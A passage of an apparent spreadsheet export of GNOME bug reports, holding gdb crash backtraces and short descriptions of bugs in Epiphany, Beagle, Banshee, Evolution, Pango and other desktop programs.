      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 53
	max_sequential_handler_number = 14378
	return_value_altered = 0
#20 0x004a2a29 in g_signal_emit_valist (instance=0xa64bfe8 signal_id=0
    detail=0 var_args=0xbfe61990
Ã‚Â¨\031ÃƒÂ¦Ã‚Â¿@ÃƒÂ—Ã‚Â¢\tÃ‚Â¸\031ÃƒÂ¦Ã‚Â¿\221)\e\001Ã‚Â¨\031ÃƒÂ¦Ã‚Â¿)
    at gsignal.c:2205
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	rtype = 0
	instance_and_params = (GValue *) 0xbfe61800
	stack_values = {{g_type = 167978776 data = {{v_int = 174374888 
        v_uint = 174374888 v_long = 174374888 v_ulong = 174374888 
        v_int64 = 174374888 v_uint64 = 174374888 v_float =
1.10138942e-32 
        v_double = 8.6152641658215032e-316 v_pointer = 0xa64bfe8} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 162760416 data = {{v_int = 168615176 v_uint = 168615176
        v_long = 168615176 v_ulong = 168615176 v_int64 = 168615176 
        v_uint64 = 168615176 v_float = 6.78232616e-33 
        v_double = 8.3306965829075454e-316 v_pointer = 0xa0cdd08} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 3219527752 data = {{
        v_int = 4898605 v_uint = 4898605 v_long = 4898605 
        v_ulong = 4898605 v_int64 = 724193264920084269 
        v_uint64 = 724193264920084269 v_float = 6.86440766e-39 
        v_double = 2.9319693270430021e-260 v_pointer = 0x4abf2d} {
        v_int = 168615176 v_uint = 168615176 v_long = 168615176 
        v_ulong = 168615176 v_int64 = -4618977532697584376 
        v_uint64 = 13827766541011967240 v_float = 6.78232616e-33 
        v_double = -0.69047929728449819 v_pointer = 0xa0cdd08}}} {
    g_type = 3813660 data = {{v_int = 161729928 v_uint = 161729928 
        v_long = 161729928 v_ulong = 161729928 v_int64 =
17832566935768456 
        v_uint64 = 17832566935768456 v_float = 3.94341033e-33 
        v_double = 1.7441243932453193e-307 v_pointer = 0x9a3cd88} {
        v_int = -1075439512 v_uint = 3219527784 v_long = -1075439512
        v_ulong = 3219527784 v_int64 = -2305842683871618968 
        v_uint64 = 16140901389837932648 v_float = -1.79761982 
        v_double = -2.6817553032109121e+154 v_pointer = 0xbfe61868}}}
{
    g_type = 168615176 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 694235575967809537 
        v_uint64 = 694235575967809537 v_float = 1.40129846e-45 
        v_double = 2.9248847923492797e-262 v_pointer = 0x1} {
        v_int = 4963212 v_uint = 4963212 v_long = 4963212 
        v_ulong = 4963212 v_int64 = 747661241103399820 
        v_uint64 = 747661241103399820 v_float = 6.95494135e-39 
        v_double = 1.0553432247563574e-258 v_pointer = 0x4bbb8c}}} {
    g_type = 168615176 data = {{v_int = -1075439480 v_uint =
3219527816 
        v_long = -1075439480 v_ulong = 3219527816 
        v_int64 = 21039351490549896 v_uint64 = 21039351490549896 
        v_float = -1.79762363 v_double = 2.9756793653903387e-307 
        v_pointer = 0xbfe61888} {v_int = 174078448 v_uint = 174078448
        v_long = 174078448 v_ulong = 174078448 v_int64 = 343771462128
        v_uint64 = 343771462128 v_float = 1.07961045e-32 
        v_double = 1.6984566945805995e-312 v_pointer = 0xa6039f0}}} {
    g_type = 1 data = {{v_int = 4899277 v_uint = 4899277 v_long =
4899277 
        v_ulong = 4899277 v_int64 = 17832566778937805 
        v_uint64 = 17832566778937805 v_float = 6.86534934e-39 
        v_double = 1.7441243622514646e-307 v_pointer = 0x4ac1cd} {
        v_int = 174078448 v_uint = 174078448 v_long = 174078448 
        v_ulong = 174078448 v_int64 = -4618976364461016592 
        v_uint64 = 13827767709248535024 v_float = 1.07961045e-32 
        v_double = -0.69060899759807448 v_pointer = 0xa6039f0}}} {
    g_type = 3758104578 data = {{v_int = 174078448 v_uint = 174078448
        v_long = 174078448 v_ulong = 174078448 v_int64 =
694639423326796272 
        v_uint64 = 694639423326796272 v_float = 1.07961045e-32 
        v_double = 3.1527044739588793e-262 v_pointer = 0xa6039f0} {
        v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = 17832566774038529 v_uint64 = 17832566774038529 
        v_float = 1.40129846e-45 v_double = 1.744124361283239e-307 
        v_pointer = 0x1}}} {g_type = 174078544 data = {{v_int =
174078448 
        v_uint = 174078448 v_long = 174078448 v_ulong = 174078448 
        v_int64 = -4618977120375260688 v_uint64 = 13827766953334290928
        v_float = 1.07961045e-32 v_double = -0.69052507425823073 
        v_pointer = 0xa6039f0} {v_int = 3947061 v_uint = 3947061 
        v_long = 3947061 v_ulong = 3947061 v_int64 =
747661653419244085 
        v_uint64 = 747661653419244085 v_float = 5.53101052e-39 
        v_double = 1.0554384964674803e-258 v_pointer = 0x3c3a35}}} {
    g_type = 161733344 data = {{v_int = -1075439416 v_uint =
3219527880 
        v_long = -1075439416 v_ulong = 3219527880 
        v_int64 = 16952294971414728 v_uint64 = 16952294971414728 
        v_float = -1.79763126 v_double = 1.5701595386115724e-307 
        v_pointer = 0xbfe618c8} {v_int = 4151968 v_uint = 4151968 
        v_long = 4151968 v_ulong = 4151968 v_int64 =
747661653419448992 
        v_uint64 = 747661653419448992 v_float = 5.81814638e-39 
        v_double = 1.0554384965148271e-258 v_pointer = 0x3f5aa0}}} {
    g_type = 3219527912 data = {{v_int = 4898605 v_uint = 4898605 
        v_long = 4898605 v_ulong = 4898605 v_int64 =
747661653420195629 
        v_uint64 = 747661653420195629 v_float = 6.86440766e-39 
        v_double = 1.0554384966873487e-258 v_pointer = 0x4abf2d} {
        v_int = 161730816 v_uint = 161730816 v_long = 161730816 
        v_ulong = 161730816 v_int64 = -4618976982948654848 
        v_uint64 = 13827767090760896768 v_float = 3.94373653e-33 
        v_double = -0.6905403316764307 v_pointer = 0x9a3d100}}} {
    g_type = 4899277 data = {{v_int = 4151968 v_uint = 4151968 
        v_long = 4151968 v_ulong = 4151968 v_int64 =
747661241102588576 
        v_uint64 = 747661241102588576 v_float = 5.81814638e-39 
        v_double = 1.0553432245689074e-258 v_pointer = 0x3f5aa0} {
        v_int = -1075439352 v_uint = 3219527944 v_long = -1075439352
        v_ulong = 3219527944 v_int64 = -2305825409513154296 
        v_uint64 = 16140918664196397320 v_float = -1.79763889 
        v_double = -2.692040910261756e+154 v_pointer = 0xbfe61908}}}
{
    g_type = 174078544 data = {{v_int = 161641512 v_uint = 161641512
        v_long = 161641512 v_ulong = 161641512 v_int64 = 4456608808 
        v_uint64 = 4456608808 v_float = 3.91093142e-33 
        v_double = 2.2018573089863079e-314 v_pointer = 0x9a27428} {
        v_int = 4899277 v_uint = 4899277 v_long = 4899277 
        v_ulong = 4899277 v_int64 = 694624751549333965 
        v_uint64 = 694624751549333965 v_float = 6.86534934e-39 
        v_double = 3.144427783284224e-262 v_pointer = 0x4ac1cd}}} {
    g_type = 174078448 data = {{v_int = -1075439320 v_uint =
3219527976 
        v_long = -1075439320 v_ulong = 3219527976 
        v_int64 = 17245675597469992 v_uint64 = 17245675597469992 
        v_float = -1.79764271 v_double = 1.6281392540072937e-307 
        v_pointer = 0xbfe61928} {v_int = 161729928 v_uint = 161729928
        v_long = 161729928 v_ulong = 161729928 v_int64 =
694629390270844296 
        v_uint64 = 694629390270844296 v_float = 3.94341033e-33 
        v_double = 3.1470445939034905e-262 v_pointer = 0x9a3cd88}}} {
    g_type = 1 data = {{v_int = 4151968 v_uint = 4151968 v_long =
4151968 
        v_ulong = 4151968 v_int64 = 694629390113266336 
        v_uint64 = 694629390113266336 v_float = 5.81814638e-39 
        v_double = 3.1470445050101007e-262 v_pointer = 0x3f5aa0} {
        v_int = 176585944 v_uint = 176585944 v_long = 176585944 
        v_ulong = 176585944 v_int64 = -4618976501897462568 
        v_uint64 = 13827767571812089048 v_float = 1.29506916e-32 
        v_double = -0.69059373908739996 v_pointer = 0xa867cd8}}} {
    g_type = 4898605 data = {{v_int = 174078448 v_uint = 174078448 
        v_long = 174078448 v_ulong = 174078448 v_int64 =
694629390283192816 
        v_uint64 = 694629390283192816 v_float = 1.07961045e-32 
        v_double = 3.1470446008695776e-262 v_pointer = 0xa6039f0} {
        v_int = -1075439272 v_uint = 3219528024 v_long = -1075439272
        v_ulong = 3219528024 v_int64 = 16649001560840536 
        v_uint64 = 16649001560840536 v_float = -1.79764843 
        v_double = 1.5102207967016794e-307 v_pointer = 0xbfe61958}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 0
	param_values = (GValue *) 0xbfe61814
	i = 1
	n_params = 1
#21 0x004a2eb3 in g_signal_emit (instance=0xa64bfe8 signal_id=53
detail=0)
    at gsignal.c:2239
No locals.
#22 0x011b2cd0 in gtk_widget_event_internal (widget=0xa64bfe8
event=0xa0cdd08)
    at gtkwidget.c:3562
	signal_num = 0
	return_val = 0
#23 0x010cd287 in gtk_propagate_event (widget=0xa64bfe8
event=0xa0cdd08)
    at gtkmain.c:2349
	tmp = (GtkWidget *) 0x9a2d740
	handled_event = 0
#24 0x010cc1c3 in gtk_main_do_event (event=0xa0cdd08) at gtkmain.c:1581
	event_widget = (GtkWidget *) 0xa64bfe8
	grab_widget = (GtkWidget *) 0xa64bfe8
	window_group = (GtkWindowGroup *) 0xa0e8740
	next_event = (GdkEvent *) 0x0
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = (GList *) 0xa64bfe8
#25 0x003c74ce in gdk_event_dispatch (source=0x0 callback=0
user_data=0x0)
    at gdkevents-x11.c:2136
	display = (GdkDisplay *) 0xa0cdd08
	event = (GdkEvent *) 0xa0cdd08
#26 0x00aa4470 in g_main_dispatch (context=0x9a47c18) at gmain.c:1904
	dispatch = (gboolean (*)(GSource * GSourceFunc 
    gpointer)) 0x3c744c 
	was_in_call = 0
	user_data = 0x0
	callback = 0
	cb_funcs = (GSourceCallbackFuncs *) 0x0
	cb_data = 0x0
	need_destroy = 161792352
	source = (GSource *) 0x9a47bd0
	depth = (gint *) 0x9a51530
	i = 0
#27 0x00aa5435 in g_main_context_dispatch (context=0x9a47c18) at
gmain.c:2450
No locals.
#28 0x00aa575a in g_main_context_iterate (context=0x9a47c18 block=1 
    dispatch=1 self=0x9a2b600) at gmain.c:2531
	got_ownership = 0
	max_priority = 2147483647
	timeout = 24
	some_ready = 1
	nfds = 1
	allocated_nfds = 12
	fds = (GPollFD *) 0xa0e8550
#29 0x00aa5df2 in g_main_loop_run (loop=0x9a70470) at gmain.c:2751
	got_ownership = 2892912
	self = (GThread *) 0x9a2b600
#30 0x010cbb37 in gtk_main () at gtkmain.c:1171
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x0
	loop = (GMainLoop *) 0x9a70470
#31 0x08071af2 in main (argc=1 argv=0xbfe61c44) at ephy-main.c:190
	context = 0x9a2e218
	context_as_value = {g_type = 68 data = {{v_int = 161669656 
      v_uint = 161669656 v_long = 161669656 v_ulong = 161669656 
      v_int64 = 161669656 v_uint64 = 161669656 v_float =
3.92126989e-33 
      v_double = 7.9875423004572159e-316 v_pointer = 0x9a2e218} {v_int
= 0 
      v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
      v_float = 0 v_double = 0 v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x0
	startup_flags = 0
	args = (const char **) 0x0
	string_arg = 0x0
	new_instance = 0
	err = (GError *) 0x0
#0  0x002b6c32 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-03-02 10:29 -------
Reassigning to the default owner of the component marco@gnome.org.
</t>
  </si>
  <si>
    <t>BEAGLE-300046</t>
  </si>
  <si>
    <t>Can't open files in best (System.ComponentModel.Win32Exception)</t>
  </si>
  <si>
    <t>Please describe the problem:
When clicking on Open in best I get the following error:
Open URI: action:_tile_25!Open
Cmd: eog
Arg:  'file:///home/syncomm/Sekahmet.jpg'
Error in OpenFromMime: System.ComponentModel.Win32Exception: Cannot find the
specified file
in [0x00289] (at
/home/cvs/1-mono/mcs/class/System/System.Diagnostics/Process.cs:823)
System.Diagnostics.Process:Start_common
(System.Diagnostics.ProcessStartInfoSystem.Diagnostics.Process)
in [0x00007] (at
/home/cvs/1-mono/mcs/class/System/System.Diagnostics/Process.cs:856)
System.Diagnostics.Process:Start ()
in  (wrapper remoting-invoke-with-check)
System.Diagnostics.Process:Start ()
in [0x00103] (at /home/syncomm/beagle/Tiles/Tile.cs:192)
Beagle.Tile.Tile:OpenFromMime (Beagle.Hitstringstringbool)
When I comment out line 249 of Tile/Tile.cs
//p.StartInfo.UseShellExecute = false
Everything works fine
Steps to reproduce:
1. Run best 
2. Do search
3. Click Open
Actual results:
Open URI: action:_tile_25!Open
Cmd: eog
Arg:  'file:///home/syncomm/Sekahmet.jpg'
Error in OpenFromMime: System.ComponentModel.Win32Exception: Cannot find the
specified file
in [0x00289] (at
/home/cvs/1-mono/mcs/class/System/System.Diagnostics/Process.cs:823)
System.Diagnostics.Process:Start_common
(System.Diagnostics.ProcessStartInfoSystem.Diagnostics.Process)
in [0x00007] (at
/home/cvs/1-mono/mcs/class/System/System.Diagnostics/Process.cs:856)
System.Diagnostics.Process:Start ()
in  (wrapper remoting-invoke-with-check)
System.Diagnostics.Process:Start ()
in [0x00103] (at /home/syncomm/beagle/Tiles/Tile.cs:192)
Beagle.Tile.Tile:OpenFromMime (Beagle.Hitstringstringbool)
Expected results:
The file would open normally
Does this happen every time?
Yes with every file type
Other information:
When I comment out line 249 of Tile/Tile.cs
//p.StartInfo.UseShellExecute = false
Everything works fine</t>
  </si>
  <si>
    <t>syncomm</t>
  </si>
  <si>
    <t>BANSHEE-360733</t>
  </si>
  <si>
    <t>Paused stream times out</t>
  </si>
  <si>
    <t>Please describe the problem:
When I'm listening to an internet radio stream and I want to stop it I click Pause.  Later when I want to continue I click Play (same button different label) and it plays OK for several seconds (out of the cache?) and then pops up a dialog box saying it can't play any more.
At this point the only way to get it to play again AFAICT is to choose Music-&gt;Open Location... and pick the latest URL again.
Steps to reproduce:
1. Start playing an internet stream (using Music -&gt; Open Location...)
2. Click the pause button
3. Go eat lunch
4. Come back and click the play button
Actual results:
It will play for several seconds (maybe 10?) and then stop and throw a dialog box at me and refuse to play any more.
Expected results:
It would keep playing the stream (until I clicked pause again or asked it to play something else).
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>BOOKWORM-124602</t>
  </si>
  <si>
    <t>growing textfield in Publisher notes</t>
  </si>
  <si>
    <t>Typing in the notes field in the Enter new Publisher dialog causes the
dialog box to grow.</t>
  </si>
  <si>
    <t>EVOLUTION-212391</t>
  </si>
  <si>
    <t>Window update is poor</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.16.99
Synopsis: Window update is poor
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
When editting a message Evolution now leaves a bunch of stray
characters
on the end of lines. That is when you have text already in the window
(because
you are replying for instance) the characters at the end of long lines
are not
clear off.
Unknown reporter: prensing@cimetrics.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>prensing</t>
  </si>
  <si>
    <t>BLAM-149259</t>
  </si>
  <si>
    <t>Rendring issue on frames around titles and show in browser link</t>
  </si>
  <si>
    <t>There's a problem with the rounded corner of frames around titles and show link
browser as shown in the attached screenshot.</t>
  </si>
  <si>
    <t>GTK+-438131</t>
  </si>
  <si>
    <t>Document GtkScrolledWindow::scrollbars-within-bevel new since 2.12</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #168326 +++
Part of solving bug 168326 was adding a scrollbars-within-bevel style property but while doing so a proper since tag was not added so it isn't marked as new since 2.12</t>
  </si>
  <si>
    <t>ACCERCISER-508778</t>
  </si>
  <si>
    <t>I need some context to translate accerciser. Could you please add some to the strings:
#: ../plugindata/validate/basic.py:77
# python-format
msgid %s index in parent does not match child index
#: ../plugindata/validate/basic.py:160
# python-format
msgid %s missing name or label
#: ../plugindata/validate/basic.py:209
# python-format
msgid %s does not belong to a set
#: ../plugindata/validate/basic.py:234
# python-format
msgid %s index %d does not match row and column
#: ../plugindata/validate/basic.py:254
# python-format
msgid %s parent index %d does not match row and column index %d
What are the variables and what can be their value. And also what exactly is set in the string 209.
Thank you very much.</t>
  </si>
  <si>
    <t>GNOME-VFS-144015</t>
  </si>
  <si>
    <t>Make gnome_vfs_monitor_callback public</t>
  </si>
  <si>
    <t>gnome_vfs_monitor_callback is part of the API needed to write a module but is
declared in gnome-vfs-monitor-private.h which is not installed. It should
probably be moved to the public API.</t>
  </si>
  <si>
    <t>PANGO-529933</t>
  </si>
  <si>
    <t>Rotation Transform Only Rotates the Layout and not the Glyphs</t>
  </si>
  <si>
    <t>Please describe the problem:
After upgrading to the latest version of pango the code I was using to render rotated text in our local version of wxX11 stopped rotating the glyphs and only transformed the layout. See screen shot.
Steps to reproduce:
pango_context_set_language (m_context pango_language_get_default ())
pango_context_set_base_dir (m_context PANGO_DIRECTION_LTR)
//do rotation
PangoMatrix rot_matrix = PANGO_MATRIX_INIT
pango_matrix_translate(
pango_matrix_rotate(
//save old transform matrix
const PangoMatrix* old_matrix = pango_context_get_matrix (m_context)
//set the rotation
pango_context_set_matrix(m_context 
//Create layout
PangoLayout *layout = pango_layout_new(m_context)
pango_layout_set_font_description(layout m_fontdesc)
const wxCharBuffer data = wxConvUTF8.cWC2MB( text )
pango_layout_set_text(layout (const char*) data strlen( (const char*) data ))
// Measure layout.
int wh
pango_layout_get_pixel_size(layout 
wxCoord width = w
wxCoord height = h
// Draw layout.
x11_draw_layout( (Drawable) m_window (GC) m_textGC x y layout m_textForegroundColour angle m_currentClippingRegion )
//Cleanup
g_object_unref( G_OBJECT( layout ) )
pango_context_set_matrix(m_context old_matrix)
void 
x11_draw_layout( Drawable     drawable
                 GC           gc
                 int          x 
                 int          y
                 PangoLayout *layout
                 wxColour    &amp;colour
				 double       rot_degrees
				 wxRegion	  clipRegion )
{
    wxCHECK_RET( layout wxT(No layout) )
	Display* xdisplay = wxGlobalDisplay()
	int xscreen = DefaultScreen( xdisplay )
	Visual* xvisual = DefaultVisual( xdisplay xscreen )
	Colormap xcolormap = DefaultColormapOfScreen( XScreenOfDisplay( xdisplay xscreen ) )
	XftDraw *draw = XftDrawCreate( wxGlobalDisplay() drawable xvisual xcolormap )
	//set clipping
	XftDrawSetClip(draw (Region) clipRegion.GetX11Region())
	//set color
	XftColor color
	color.pixel = 0
	color.color.red = colour.Red() &lt;&lt; 8
	color.color.green = colour.Green() &lt;&lt; 8
	color.color.blue = colour.Blue() &lt;&lt; 8
	color.color.alpha = 65000
	pango_xft_render_layout(draw 
	//clean up
	XftDrawDestroy( draw )
}
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>lwalkera</t>
  </si>
  <si>
    <t>EVOLUTION-219362</t>
  </si>
  <si>
    <t>f/b scrolling is confusing</t>
  </si>
  <si>
    <t>In the scheduling pane of the event dialog the page size for the
free/busy dialog is such that if you drag the box in the scrollbar
the information appears to be sliding backwards. Eg:
     | Mon      | Tue      | Wed      |
and if you scroll one pixel right you get:
        | Tue      | Wed      | Thu      |
so the data has scrolled to the left like it should but the lines
have moved right which (especially if you're scrolling quickly)
makes it look like the data moved right.</t>
  </si>
  <si>
    <t>EVOLUTION-376824</t>
  </si>
  <si>
    <t>crash in Evolution: I had 3 compose windows ...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
I had 3 compose windows open 2 of them in plain text mode and 1 of them in HTML mode. HTML a table with 6 columns and around 30 rows (I copied a spreadsheet from gnumeric). I've sent the first plaintext message and the composer window closed. I've sent the second plaintext message while the HTML one is still open and then it crashed.
Distribution: Ubuntu 7.04 (feisty)
Gnome Release: 2.17.2 2006-11-14 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 240234496 vsize: 0 resident: 240234496 share: 0 rss: 62808064 rss_rlim: 0
CPU usage: start_time: 1163887478 rtime: 0 utime: 9121 stime: 0 cutime:8483 cstime: 0 timeout: 638 it_real_value: 0 frequency: 70
Backtrace was generated from '/usr/bin/evolution-2.8'
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1233442608 (LWP 13976)]
[New Thread -1350415472 (LWP 14576)]
[New Thread -1350149232 (LWP 14354)]
[New Thread -1341322352 (LWP 14305)]
[New Thread -1321616496 (LWP 14296)]
[New Thread -1312867440 (LWP 14241)]
[New Thread -1304474736 (LWP 14234)]
[New Thread -1287308400 (LWP 14233)]
[New Thread -1295701104 (LWP 14197)]
[New Thread -1278915696 (LWP 14194)]
[New Thread -1261438064 (LWP 14193)]
[New Thread -1251906672 (LWP 14158)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb710169b in waitpid () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7e281b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  0x0805f8e9 in segv_redirect (sig=11) at main.c:426
#4  
#5  0xb74ad7c9 in html_object_destroy () from /usr/lib/libgtkhtml-3.8.so.15
#6  0xb7490be1 in html_engine_table_set_spacing ()
   from /usr/lib/libgtkhtml-3.8.so.15
#7  0xb74cda7a in html_undo_data_unref () from /usr/lib/libgtkhtml-3.8.so.15
#8  0xb74ce5cd in html_undo_action_destroy ()
   from /usr/lib/libgtkhtml-3.8.so.15
#9  0xb74cd90a in html_undo_data_ref () from /usr/lib/libgtkhtml-3.8.so.15
#10 0xb74cdca1 in html_undo_destroy () from /usr/lib/libgtkhtml-3.8.so.15
#11 0xb74a184a in html_engine_new () from /usr/lib/libgtkhtml-3.8.so.15
#12 0xb758baec in g_object_unref () from /usr/lib/libgobject-2.0.so.0
#13 0xb7472933 in gtk_html_get_selection_html ()
   from /usr/lib/libgtkhtml-3.8.so.15
#14 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#15 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#16 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#17 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#18 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#19 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#20 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#21 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#22 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#23 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#24 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#25 0xb789649f in gtk_button_box_set_child_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
#26 0xb79c1568 in _gtk_scrolled_window_get_scrollbar_spacing ()
   from /usr/lib/libgtk-x11-2.0.so.0
#27 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
#28 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0xb79c3e11 in gtk_scrolled_window_new () from /usr/lib/libgtk-x11-2.0.so.0
#30 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#31 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#32 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#33 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#34 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#35 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#36 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#37 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#38 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#39 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#40 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#41 0xb789a0e0 in gtk_box_pack_start_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#42 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
#43 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
#44 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#45 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#46 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#47 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#48 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#49 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#50 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#51 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#52 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#53 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#54 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#55 0xb7d88c07 in bonobo_control_set_plug () from /usr/lib/libbonoboui-2.so.0
#56 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#57 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#58 0xb758979b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#59 0xb759a1e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#60 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#61 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#62 0xb7d00ba4 in bonobo_object_unref () from /usr/lib/libbonobo-2.so.0
#63 0xb7d01030 in bonobo_object_list_unref_all ()
   from /usr/lib/libbonobo-2.so.0
#64 0xb7c763c6 in _ORBIT_skel_small_Bonobo_Unknown_unref ()
   from /usr/lib/libbonobo-activation.so.4
#65 0xb7c1abe0 in ORBit_c_stub_invoke () from /usr/lib/libORBit-2.so.0
#66 0xb7c77edf in Bonobo_Unknown_unref ()
   from /usr/lib/libbonobo-activation.so.4
#67 0xb7cffd94 in bonobo_object_release_unref ()
   from /usr/lib/libbonobo-2.so.0
#68 0xb7d8603a in bonobo_control_frame_bind_to_control ()
   from /usr/lib/libbonoboui-2.so.0
#69 0xb7d861f2 in bonobo_control_frame_bind_to_control ()
   from /usr/lib/libbonoboui-2.so.0
#70 0xb758ba4b in g_object_unref () from /usr/lib/libgobject-2.0.so.0
#71 0xb7d009e7 in bonobo_object_unref () from /usr/lib/libbonobo-2.so.0
#72 0xb7d8c8b6 in bonobo_socket_set_control_frame ()
   from /usr/lib/libbonoboui-2.so.0
#73 0xb7d8caf7 in bonobo_socket_new () from /usr/lib/libbonoboui-2.so.0
#74 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#75 0xb798adfe in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#76 0xb7a85f25 in gtk_widget_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#77 0xb789649f in gtk_button_box_set_child_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
#78 0xb78d541b in gtk_container_foreach () from /usr/lib/libgtk-x11-2.0.so.0
#79 0xb78d5d60 in _gtk_container_dequeue_resize_handler ()
   from /usr/lib/libgtk-x11-2.0.so.0
#80 0xb7596b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#81 0xb7587fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#82 0xb758987d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#83 0xb759a34f in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#84 0xb759b0b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#85 0xb759b279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#86 0xb798b0f1 in gtk_object_destroy () from /usr/lib/libgtk-x11-2.0.so.0
#87 0xb7a85d41 in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#88 0xb7daaa15 in bonobo_widget_new_control_async ()
   from /usr/lib/libbonoboui-2.so.0
#89 0xb758be30 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
